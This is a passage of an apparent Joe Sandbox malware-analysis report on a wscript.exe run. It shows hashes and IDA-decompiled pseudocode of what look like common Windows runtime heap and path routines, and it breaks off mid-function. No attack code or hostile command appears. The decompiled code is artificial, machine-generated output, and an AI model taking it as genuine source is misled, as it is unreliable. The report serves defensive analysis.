0x05958b17
0x05958b1a
0x05958b1a
0x00000000
0x05958ad5
0x05958a89

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c12b05d2a073e171e2349dcecfef24e840b165307e542b1d8207ca59b7226bb
Instruction ID: fe9403e28d40799b6ef005b5d260fe892f4193c8c99bde144bc6e855b25126d3
Opcode Fuzzy Hash: 0c12b05d2a073e171e2349dcecfef24e840b165307e542b1d8207ca59b7226bb
Instruction Fuzzy Hash: 3A415DB1A002289BDB24DF55C888AB9B7BDFB84310F2045EADC1997251E7709E91CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05A0AA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05A0AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E05A0ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E05A0AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E05A0AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E059ECB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L059677F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E05967D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E05A0131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E059ECB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x05a0aa1f
0x05a0aa21
0x05a0aa23
0x05a0aa2b
0x05a0aa30
0x05a0aa36
0x05a0aa39
0x05a0aa42
0x05a0aa75
0x05a0aa7a
0x05a0aa7c
0x05a0aa7c
0x05a0aa88
0x05a0aa8a
0x05a0aa8f
0x05a0ab02
0x05a0ab04
0x05a0aa99
0x05a0aaa8
0x05a0aaaf
0x05a0aab3
0x05a0aacc
0x05a0aad1
0x05a0aad6
0x05a0aae0
0x05a0aaf3
0x05a0aaf9
0x05a0aafe
0x05a0aafe
0x05a0aaf3
0x05a0aad6
0x05a0aab3
0x05a0ab07
0x05a0ab0a
0x05a0ab11
0x05a0ab23
0x05a0ab13
0x05a0ab1c
0x05a0ab1c
0x05a0ab2b
0x05a0ab44
0x05a0ab44
0x05a0ab51
0x05a0ab51
0x05a0aa44
0x05a0aa47
0x05a0aa4c
0x00000000
0x00000000
0x05a0aa5a
0x05a0aa64
0x05a0aa72
0x00000000
0x05a0aa66
0x05a0aa66
0x05a0aa68
0x05a0aa6a
0x00000000
0x05a0aa6a

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: e6a07ea9e7099a9aea280932614c225308b81e27b3dcdb2f978f93c0b24dcb5f
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 5031DD32F102146BDB15AB69EC89FAFF7BBEB81310F099069E816A72D1DA749D00C650

Uniqueness

Uniqueness Score: -1.00%

Function 05A0FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05A0FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E05A0FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E05A10A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E05967D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E05A01608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E05A12B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E05A0C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E05A0DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E05967D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E05A0A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x05a0fde7
0x05a0fde8
0x05a0fdec
0x05a0fdee
0x05a0fdf5
0x05a0fdf7
0x05a0fdfc
0x05a0fe19
0x05a0fe22
0x05a0fe26
0x05a0fec6
0x05a0fecd
0x05a0fed5
0x05a0fee7
0x05a0fed7
0x05a0fee0
0x05a0fee0
0x05a0feef
0x05a0ff00
0x05a0ff02
0x05a0ff07
0x05a0ff07
0x00000000
0x05a0feef
0x05a0fe33
0x05a0fe55
0x05a0fe59
0x05a0fe5b
0x05a0fe5e
0x05a0fe69
0x05a0fe6d
0x05a0fe6d
0x05a0fe69
0x05a0fe35
0x05a0fe41
0x05a0fe41
0x05a0fe79
0x05a0fe8b
0x05a0fe7b
0x05a0fe84
0x05a0fe84
0x05a0fe93
0x00000000
0x05a0fea8
0x05a0feba
0x00000000
0x05a0feba
0x05a0fdfe
0x05a0fe01
0x05a0fe02
0x05a0fe08
0x05a0ff0c
0x05a0ff14
0x05a0ff14

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: eca7fc3f8b6324969c8cf6d56c243bff9044dca4aacfabe3bdb8df39ac999ba2
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 9B3126323246406FD332C768E948F6ABBEAFBC5340F186158E846AB3C1DA74EC41C720

Uniqueness

Uniqueness Score: -1.00%

Function 05A0EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E05A0EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E05962280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E05A0E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0594F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0595FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E05A0AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E05A0BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E05967D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E059FFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0595FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E05A0A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x05a0ea55
0x05a0ea66
0x05a0ea68
0x05a0ea6c
0x05a0ea6f
0x05a0ea72
0x05a0ea75
0x05a0ea7a
0x05a0ea7a
0x05a0ea7e
0x05a0ea80
0x05a0ea85
0x05a0ea8b
0x05a0eab5
0x05a0eabc
0x05a0eabf
0x05a0eabf
0x05a0eaca
0x05a0eace
0x05a0ead0
0x05a0eae4
0x05a0eaeb
0x05a0eaf0
0x05a0eaf5
0x05a0eb09
0x05a0eb0d
0x05a0eb1d
0x05a0eb2d
0x05a0eb38
0x05a0eb3d
0x05a0eb41
0x05a0eb4a
0x05a0eb60
0x05a0eb4c
0x05a0eb52
0x05a0eb59
0x05a0eb59
0x05a0eb68
0x05a0eb71
0x05a0eb71
0x05a0ea8d
0x05a0ea8f
0x05a0ea92
0x05a0ea97
0x05a0ea97
0x05a0ea9b
0x05a0ea9c
0x05a0ea9e
0x05a0eaa6
0x05a0eaa6
0x05a0eb7e

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 7b6a6dd806e256e1619db94f55ef73bac8315544538f2eae4bca0d048531b9a5
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 3231D4727147059BC719EF24D884E6BB7AAFBC4310F04992DF95287780DE34E809CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 059C69A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E059C69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x5a3d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L05956C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E059C6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E05989980() >= 0) {
							E05962280(_t56, 0x5a38778);
							_t77 = 1;
							_t68 = 1;
							if( *0x5a38774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x5a38774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0594B6F0(0x592c338, 0x592c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E05989520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E059895D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0595FFB0(_t68, _t77, 0x5a38778);
				}
				_pop(_t78);
				return E0598B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x059c69b5
0x059c69be
0x059c69c3
0x059c69c9
0x059c69cc
0x059c69d1
0x059c69d3
0x059c69de
0x059c69e1
0x059c69ea
0x059c69f6
0x059c69fe
0x059c6a13
0x059c6a14
0x059c6a15
0x059c6a16
0x059c6a1e
0x059c6a26
0x059c6a31
0x059c6a36
0x059c6a37
0x059c6a40
0x059c6a49
0x059c6a4a
0x059c6a53
0x059c6a59
0x059c6a5d
0x059c6a5e
0x059c6a64
0x059c6a67
0x059c6a6a
0x059c6a6d
0x059c6a70
0x059c6a77
0x059c6a7d
0x059c6a86
0x059c6a89
0x059c6a9c
0x059c6a9f
0x059c6aa2
0x059c6aa5
0x059c6aaf
0x059c6ab1
0x059c6ab8
0x059c6ab9
0x059c6abb
0x059c6abe
0x059c6ac5
0x059c6ac5
0x059c6aaf
0x059c6a40
0x059c6a26
0x059c69fe
0x059c6ace
0x059c6ad0
0x059c6ad3
0x059c6ad8
0x059c6adf
0x059c6adf
0x059c6ae8
0x059c6aef
0x059c6aef
0x059c6af9
0x059c6b06

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc43715e90dfe65b432d23bfa9650f38fcacfab8b21deb1d5f2bd09df119c82c
Instruction ID: eecec86129dfd0459b0ce20942f7fdcdf7b949a497b689b96917d10837af2546
Opcode Fuzzy Hash: fc43715e90dfe65b432d23bfa9650f38fcacfab8b21deb1d5f2bd09df119c82c
Instruction Fuzzy Hash: FC4199B1E01208AFDB10DFA8C840BFEBBF8FF88314F14816AE915A3240DB35A905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05945210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E05945210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E059452A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E059895D0();
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0595EB70(_t54, 0x5a379a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E059895D0();
								L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0595EB70(_t54, 0x5a379a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0598F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0595EB70(_t54, 0x5a379a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E059895D0();
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x05945220
0x05945224
0x059a0d13
0x059a0d16
0x059a0d19
0x0594522a
0x0594522a
0x0594522d
0x0594522d
0x05945231
0x05945235
0x05945239
0x059a0d5c
0x059a0d62
0x00000000
0x00000000
0x059a0d6a
0x059a0d7b
0x059a0d7f
0x059a0d81
0x059a0d84
0x059a0d95
0x059a0d95
0x059a0d6c
0x059a0d71
0x059a0d71
0x059a0d9a
0x00000000
0x0594524a
0x0594524a
0x05945250
0x059a0d24
0x059a0d35
0x059a0d39
0x059a0d3b
0x059a0d3e
0x059a0d50
0x059a0d50
0x059a0d26
0x059a0d2b
0x059a0d2b
0x00000000
0x059a0d55
0x05945256
0x0594525b
0x05945265
0x059a0da7
0x0594526b
0x0594526e
0x05945272
0x059a0db1
0x059a0db4
0x059a0dc5
0x059a0dc5
0x05945272
0x05945278
0x0594527e
0x0594528a
0x0594528c
0x0594528d
0x00000000
0x05945280
0x05945282
0x05945288
0x0594529f
0x05945292
0x00000000
0x05945292
0x00000000
0x05945288
0x0594527e

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45410526b8e36591c40e7e967859e2b0723eeb40e0a7dfeab386d2473828362
Instruction ID: 936f1434829c1135a3eb495aa136d85e011bdea04387aeff7e03b2d37cf37f11
Opcode Fuzzy Hash: e45410526b8e36591c40e7e967859e2b0723eeb40e0a7dfeab386d2473828362
Instruction Fuzzy Hash: D431C533755741ABC725AF58C849F7A77AAFF40760F124A2AE8164B5A0E771FD00CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 05983D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05983D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E05957B60(0, _t61, 0x59211c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E05957B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L05964620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x05983d4c
0x05983d50
0x05983d55
0x05983d5e
0x059be79a
0x00000000
0x059be79a
0x05983d68
0x059be789
0x05983d9d
0x05983da3
0x05983daf
0x05983db5
0x05983dbc
0x05983dc4
0x05983dc9
0x05983dce
0x059be7ae
0x059be7ae
0x05983dde
0x05983de2
0x05983de7
0x05983e0d
0x05983e13
0x05983e16
0x05983e1e
0x05983e25
0x05983e28
0x00000000
0x00000000
0x05983e2a
0x05983e2f
0x05983e37
0x05983e37
0x00000000
0x05983e37
0x05983e31
0x00000000
0x05983e31
0x05983e20
0x05983e20
0x05983e35
0x00000000
0x05983de9
0x05983de9
0x05983de9
0x05983dee
0x05983dfd
0x05983dff
0x05983e02
0x05983e05
0x05983e05
0x00000000
0x05983df0
0x05983de7
0x059be78f
0x059be794
0x05983d79
0x05983d84
0x05983d89
0x05983d8e
0x00000000
0x059be7a4
0x05983d96
0x05983d9a
0x00000000
0x05983d9a
0x00000000
0x059be794
0x05983d6e
0x05983d73
0x00000000
0x059be7b5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d1d5a466d3e2db9d81426e1f241faae4277c24e99b8fb14eb1c86a8548c9dfa
Instruction ID: f81b9dd91c024d6c003b2101fb0468ccf9a75825175b493e6f99d517a41130b7
Opcode Fuzzy Hash: 9d1d5a466d3e2db9d81426e1f241faae4277c24e99b8fb14eb1c86a8548c9dfa
Instruction Fuzzy Hash: E031C332605615DBD724DF29D881A7BBBFAFF85B10705886EE84ACB351E770D840C790

Uniqueness

Uniqueness Score: -1.00%

Function 0597A61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0597A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x5a20220);
				E0599D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x5a37b9c; // 0x0
				_t55 = L05964620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0599D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x5a37b10 =  *0x5a37b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x5a3536c; // 0x2a9d6a8
					if( *_t51 != 0x5a35368) {
						_push(3);
